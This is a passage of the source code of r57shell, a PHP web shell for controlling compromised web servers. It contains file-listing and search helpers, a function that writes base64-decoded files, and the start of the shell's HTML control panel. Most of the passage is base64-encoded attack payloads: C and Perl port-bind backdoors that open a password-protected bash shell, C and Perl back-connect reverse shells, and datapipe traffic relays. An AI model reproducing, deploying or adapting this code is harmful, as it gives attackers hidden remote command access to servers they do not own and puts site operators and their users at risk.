692if(!empty($path)) return $path; else return 0;
693}
694
695/* create file */
696function cf($fname,$text)
697{
698 $w_file=@fopen($fname,"w") or we($fname);
699 if($w_file)
700 {
701 @fputs($w_file,@base64_decode($text));
702 @fclose($w_file);
703 }
704}
705
706if (!@function_exists("view_size"))
707{
708function view_size($size)
709{
710 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
711 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
712 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
713 else {$size = $size . " B";}
714 return $size;
715}
716}
717
718function DirFiles($dir,$types='')
719 {
720 $files = Array();
721 if($handle = @opendir($dir))
722 {
723 while (false !== ($file = @readdir($handle)))
724 {
725 if ($file != "." && $file != "..")
726 {
727 if(!is_dir($dir."/".$file))
728 {
729 if($types)
730 {
731 $pos = @strrpos($file,".");
732 $ext = @substr($file,$pos,@strlen($file)-$pos);
733 if(@in_array($ext,@explode(';',$types)))
734 $files[] = $dir."/".$file;
735 }
736 else
737 $files[] = $dir."/".$file;
738 }
739 }
740 }
741 @closedir($handle);
742 }
743 return $files;
744 }
745
746 function DirFilesWide($dir)
747 {
748 $files = Array();
749 $dirs = Array();
750 if($handle = @opendir($dir))
751 {
752 while (false !== ($file = @readdir($handle)))
753 {
754 if ($file != "." && $file != "..")
755 {
756 if(@is_dir($dir."/".$file))
757 {
758 $file = @strtoupper($file);
759 $dirs[$file] = '<DIR>';
760 }
761 else
762 $files[$file] = @filesize($dir."/".$file);
763 }
764 }
765 @closedir($handle);
766 @ksort($dirs);
767 @ksort($files);
768 $files = @array_merge($dirs,$files);
769 }
770 return $files;
771 }
772
773 function DirFilesR($dir,$types='')
774 {
775 $files = Array();
776 if($handle = @opendir($dir))
777 {
778 while (false !== ($file = @readdir($handle)))
779 {
780 if ($file != "." && $file != "..")
781 {
782 if(@is_dir($dir."/".$file))
783 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
784 else
785 {
786 $pos = @strrpos($file,".");
787 $ext = @substr($file,$pos,@strlen($file)-$pos);
788 if($types)
789 {
790 if(@in_array($ext,explode(';',$types)))
791 $files[] = $dir."/".$file;
792 }
793 else
794 $files[] = $dir."/".$file;
795 }
796 }
797 }
798 @closedir($handle);
799 }
800 return $files;
801 }
802
803 function DirPrintHTMLHeaders($dir)
804 {
805 $handle = @opendir($dir) or die("Can't open directory $dir");
806 echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n";
807 while (false !== ($file = @readdir($handle)))
808 {
809 if ($file != "." && $file != "..")
810 {
811 if(@is_dir($dir."/".$file))
812 {
813 echo " <li><b>[ $file ]</b></li>\n";
814 DirPrintHTMLHeaders($dir."/".$file);
815 }
816 else
817 {
818 $pos = @strrpos($file,".");
819 $ext = @substr($file,$pos,@strlen($file)-$pos);
820 if(@in_array($ext,array('.htm','.html')))
821 {
822 $header = '-=None=-';
823 $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
824 for($a=0;$a<count($strings);$a++)
825 {
826 $pattern = '(<title>(.+)</title>)';
827 if(@eregi($pattern,$strings[$a],$pockets))
828 {
829 $header = "«".$pockets[2]."»";
830 break;
831 }
832 }
833 echo " <li>".$header."</li>\n";
834 }
835 }
836 }
837 }
838 echo " </ul>\n";
839 @closedir($handle);
840 }
841
842 class SearchResult
843 {
844 var $text;
845 var $FilesToSearch;
846 var $ResultFiles;
847 var $FilesTotal;
848 var $MatchesCount;
849 var $FileMatschesCount;
850 var $TimeStart;
851 var $TimeTotal;
852 var $titles;
853
854 function SearchResult($dir,$text,$filter='')
855 {
856 $dirs = @explode(";",$dir);
857 $this->FilesToSearch = Array();
858 for($a=0;$a<count($dirs);$a++)
859 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
860 $this->text = $text;
861 $this->FilesTotal = @count($this->FilesToSearch);
862 $this->TimeStart = getmicrotime();
863 $this->MatchesCount = 0;
864 $this->ResultFiles = Array();
865 $this->FileMatchesCount = Array();
866 $this->titles = Array();
867 }
868
869 function GetFilesTotal() { return $this->FilesTotal; }
870 function GetTitles() { return $this->titles; }
871 function GetTimeTotal() { return $this->TimeTotal; }
872 function GetMatchesCount() { return $this->MatchesCount; }
873 function GetFileMatchesCount() { return $this->FileMatchesCount; }
874 function GetResultFiles() { return $this->ResultFiles; }
875 function SearchText($phrase=0,$case=0) {
876 $qq = @explode(' ',$this->text);
877 $delim = '|';
878 if($phrase)
879 foreach($qq as $k=>$v)
880 $qq[$k] = '\b'.$v.'\b';
881 $words = '('.@implode($delim,$qq).')';
882 $pattern = "/".$words."/";
883 if(!$case)
884 $pattern .= 'i';
885 foreach($this->FilesToSearch as $k=>$filename)
886 {
887 $this->FileMatchesCount[$filename] = 0;
888 $FileStrings = @file($filename) or @next;
889 for($a=0;$a<@count($FileStrings);$a++)
890 {
891 $count = 0;
892 $CurString = $FileStrings[$a];
893 $CurString = @Trim($CurString);
894 $CurString = @strip_tags($CurString);
895 if($count = @preg_match_all($pattern,$CurString,$aa))
896 {
897 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
898 $this->ResultFiles[$filename][$a+1] = $CurString;
899 $this->MatchesCount += $count;
900 $this->FileMatchesCount[$filename] += $count;
901 }
902 }
903 }
904 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
905 }
906 }
907
908 function getmicrotime()
909 {
910 list($usec,$sec) = @explode(" ",@microtime());
911 return ((float)$usec + (float)$sec);
912 }
913
914/*** base64 ---------------------------------------------------------------------------------------------------- */
915/* --- Port bind source C -------------------------------------------------------------------------------------- */
916$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
917A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
918GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
919b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
920pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
921NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
922ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
923ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
9247DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9259tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
9262ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
927dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
928lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
929/* --- END Port bind source C ---------------------------------------------------------------------------------- */
930/* --- Port bind source PERL ----------------------------------------------------------------------------------- */
931$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
932VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
933JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
934TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
935lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
936Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
937Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
938lIENPTk47DQpleGl0IDA7DQp9DQp9";
939/* --- END Port bind source PERL ------------------------------------------------------------------------------- */
940/* --- Back connect source PERL -------------------------------------------------------------------------------- */
941$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
942aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
943hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
944sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
945kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
946KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
947OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
948/* --- END Back connect source PERL ---------------------------------------------------------------------------- */
949/* --- Back connect source C ----------------------------------------------------------------------------------- */
950$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
951BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
952SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
953KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
954sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
955Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
956QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
957Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
958/* --- END Back connect source C ------------------------------------------------------------------------------- */
959/* --- datapipe.c ---------------------------------------------------------------------------------------------- */
960$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
961x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
962HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
963aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
964lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
965xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
966W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
967LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
968udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
9690KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
970iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
971KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
972gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
973hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
974iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
975ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
976vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
977AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
978QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
979ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
980gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
981wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
98229jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
983MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
984gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
9855zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
986HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
987dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
988KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
989ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
990E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
991Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
992NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
993J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
994CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
995dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
996gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
997lsZSk7DQogIHJldHVybiAwOw0KfQ==";
998/* --- END datapipe.c ------------------------------------------------------------------------------------------ */
999/* --- datapipe.pl --------------------------------------------------------------------------------------------- */
1000$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1001CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1002bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1003gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1004NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1005iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1006aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1007SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1008xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1009WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1010CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1011yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1012I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1013m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1014IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1015lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1016QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1017CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1018c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1019NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1020UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1021DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1022ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
10231ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1024/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
1025
1026/*** END base64 ------------------------------------------------------------------------------------------------ */
1027
1028//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
1029/* LOGO + info */
1030echo $head;
1031echo '</head>
1032<body bgcolor="#e4e0d8">
1033<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1034<tr><td bgcolor=#cccccc width=160>
1035<!-- logo -->
1036<font face=Verdana size=2>'.ws(1).'
1037<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
1038</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
1039$si = 3;
1040echo ws(2);
1041echo "<b>".date ("d-m-Y H:i:s")."</b>";
1042echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1043echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1044echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1045echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1046echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1047echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1048echo ws(2);
1049echo (($safe_mode)?("safe_mode: <b>ON</b>"):("safe_mode: <b>OFF</b>"));
1050echo ws(2);
1051echo "PHP version: <b>".@phpversion()."</b>";
1052$curl_on = @function_exists('curl_version');
1053echo ws(2);
1054echo "cURL: ".(($curl_on)?("<b>ON (".@curl_version().")</b>"):("<b>OFF</b>"));
1055echo ws(2);
1056echo "MySQL: <b>";
1057$mysql_on = @function_exists('mysql_connect');
1058if($mysql_on)
1059 {
1060 $client_api = @function_exists('mysql_get_client_info') ? @mysql_get_client_info() : "";
1061 echo "ON ($client_api)</b>";
1062 }
1063else
1064 {
1065 echo "OFF</b>";
1066 }
